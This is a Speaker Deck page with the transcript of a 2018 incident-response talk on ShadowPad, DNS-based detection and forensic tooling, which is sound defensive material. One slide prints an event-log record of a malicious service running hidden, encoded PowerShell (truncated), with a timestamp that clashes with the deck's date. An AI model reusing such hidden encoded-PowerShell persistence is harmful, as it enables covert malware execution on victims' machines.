Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Sergey Golovanov - Indecent Response 2018
Search
DC7499
February 10, 2018
Education
580
0
Share
Embed
Copy iframe code
Copy JS code
Copy link
Start on current slide
Sergey Golovanov - Indecent Response 2018
DC7499
February 10, 2018
More Decks by DC7499
See All by DC7499
Sergey Sobko - Hackashop: Hackathon + Pentest + Workshop [RU]
defcon
0
580
Dmitry Sklyarov - Intel ME: Security keys Genealogy, Obfuscation and other Magic
defcon
0
310
Anton Lopanitsyn - Initial reconnaissance of web applications.
defcon
0
320
Dmitry Volkov - Private messengers: without pain??
defcon
1
250
Andrey Skuratov and Sergey Migalin - DNS tunneling in 2018. What is that, and what to do with it?
defcon
2
230
Sergey Belov - Another side of Bug Bounty programs
defcon
0
330
Dmitry Sklyarov - Intel ME: Flash file system explained
defcon
0
570
Maxim Goryachiy & Mark Ermolov - Inside Intel Management Engine
defcon
0
680
Kupreev Oleg & Putin Vladimir - Your very own driver for the custom NVMe device from the scratch: reading of the flash memory of iPhone 7
defcon
1
680
Other Decks in Education
See All in Education
Πλουτοκρατία: Η Τυραννία του Μαμμωνά και η Μεταανθρώπινη Δουλεία
amethyst1
0
270
勾配ブースティングと決定木の話 / gradient boosting and decision trees
kaityo256
PRO
6
1.3k
モブ社員がモブエンジニアを名乗って得られたこと_20260413
masakiokuda
4
520
[2026前期火5] 論理学(京都大学文学部 前期 第5回)「 ならばの問題演習・proof net・かつの規則」
yatabe
0
310
2026年度春学期 統計学 講義の進め方と成績評価について (2026. 4. 9)
akiraasano
PRO
0
200
Human-AI Interaction - Lecture 11 - Next Generation User Interfaces (4018166FNR)
signer
PRO
0
1.1k
生成AIを授業の相棒にするデータサイエンス入門(「デジタル✕探究」イノベーターズフォーラム テクニカルセッション講演資料)
datascientistsociety
PRO
0
300
勝手にCULTIBASE で広げよう、探究の輪! - CULTIVAL 2026
hiroc_sk
1
220
Portable & Reproducible Research Environments in the Age of AI Agents
denkiwakame
0
370
면접관 눈에 띄는 데이터 분석 포트폴리오 만드는 법 | 2026년 5월 세미나
datarian
0
800
The Art & Science of Elearning
tmiket
1
220
焦燥を平穏に変えるエンジニアのための哲学
ichimichi
4
3.8k
Featured
See All Featured
Abbi's Birthday
coloredviolet
3
8.2k
Fashionably flexible responsive web design (full day workshop)
malarkey
408
66k
DevOps and Value Stream Thinking: Enabling flow, efficiency and business value
helenjbeal
1
240
The Organizational Zoo: Understanding Human Behavior Agility Through Metaphoric Constructive Conversations (based on the works of Arthur Shelley, Ph.D)
kimpetersen
PRO
0
370
Imperfection Machines: The Place of Print at Facebook
scottboms
270
14k
AI Search: Implications for SEO and How to Move Forward - #ShenzhenSEOConference
aleyda
1
1.3k
The World Runs on Bad Software
bkeepers
PRO
72
12k
We Are The Robots
honzajavorek
0
250
Taking LLMs out of the black box: A practical guide to human-in-the-loop distillation
inesmontani
PRO
3
2.3k
Avoiding the “Bad Training, Faster” Trap in the Age of AI
tmiket
0
180
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
47
8.2k
Let's Do A Bunch of Simple Stuff to Make Websites Faster
chriscoyier
508
140k
Transcript
Indecent response 2018 Sergey @k1k_ Golovanov Principal Security Researcher Kaspersky
Lab
Challenge: find a SDC bus speed
None
Agenda 1.Shadowpad 2.0x403AA91EE 4.Plans 3.Scanner2
1.Shadowpad
Case overview: 1.Antifraud system in a bank is detecting printing
of a lot of elite cards for the last several hours 2.Bank is starting network audit 3.Bank is discovering suspicion DNS requests 4.Forensics can not find malware on PCs 5.Bank asks for help…
DNS requests
None
None
“Our worldwide customers range from small businesses right up to
global Fortune 500 companies.” NetSarang AmericanExpress BankofAmericaCorp. BankofChina BNPParibas Citigroup DeutscheBank Fortis GeneralElectric INGGroup MerrillLynch MorganStanley ShinhanFinancialGroup SocieteGenerale UBS https://webcache.googleusercontent.com/search?q=cache:m7Nc1_mRksgJ:https://www.netsara ng.com/about/client.html+&cd=1&hl=ru&ct=clnk&gl=ru
https://securelist.com/shadowpad -in-corporate-networks/81432/
What was done?
AutoMA – static analysis framework
Shadowpad after autoMA
Miniduke after autoMA
2.0x403AA91EE
Case overview:
None
None
How to find suspicion DNS requests? sort | uniq -c
| sort -rn
How to find suspicion powershell? sort | uniq -c |
sort -rn
parse_evtx.exe System.evtx | findstr /i "power" | more Record #2396788
2027.02.22-08:03:00 'Computer':PC1', 'Channel':'System', 'EventSourceName':'Service Control Manager', 'Guid':‘GUID'Name':'Service Control Manager', 'xmlns':'http://schemas.microsoft.com/win/2004/08/events/event', 'Level':04, 'Opcode':00, 'Task':0000, 'EventID':7045 (A service was installed in the system.), 'Qualifiers':16384, 'Keywords':8080000000000000, 'SystemTime':2027.02.22-08:03:00, 'ProcessID':00000648, 'ThreadID':00010692, 'EventRecordID':0000000002396788, 'Version':00, 'UserID':SID, 'ServiceName':‘1aec4f0', 'ImagePath':'%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5A FMAdAByAGUAYQBtACgA
https://github.com/KasperskyLab/ForensicsTools/
3.Scanner2
Case overview: 1. No money 2. No logs 3. No
team 4. No idea about network 5. CISO!
What to do? we need logs we need mfts we
need regs
WE NEED TO RECOMPILE EVERYTHING!
Awesome batch file
How to find something suspicion ? sort | uniq -c
| sort -rn
https://cdn.securelist.com/files/ 2017/12/HappyNewYear.zip
4. PLANS
1. MFT is a hell. Sleuthkit is not enough. We
need more data about deleted files. 2. USN J is required with no HDD touch. 3. Reg analysis is needed with unallocated part.
Agenda 1.Shadowpad 2.0x403AA91EE 4.Plans 3.Scanner2
Зачем?
None
Thank you! Sergey @k1k_ Golovanov Principal Security Researcher Kaspersky Lab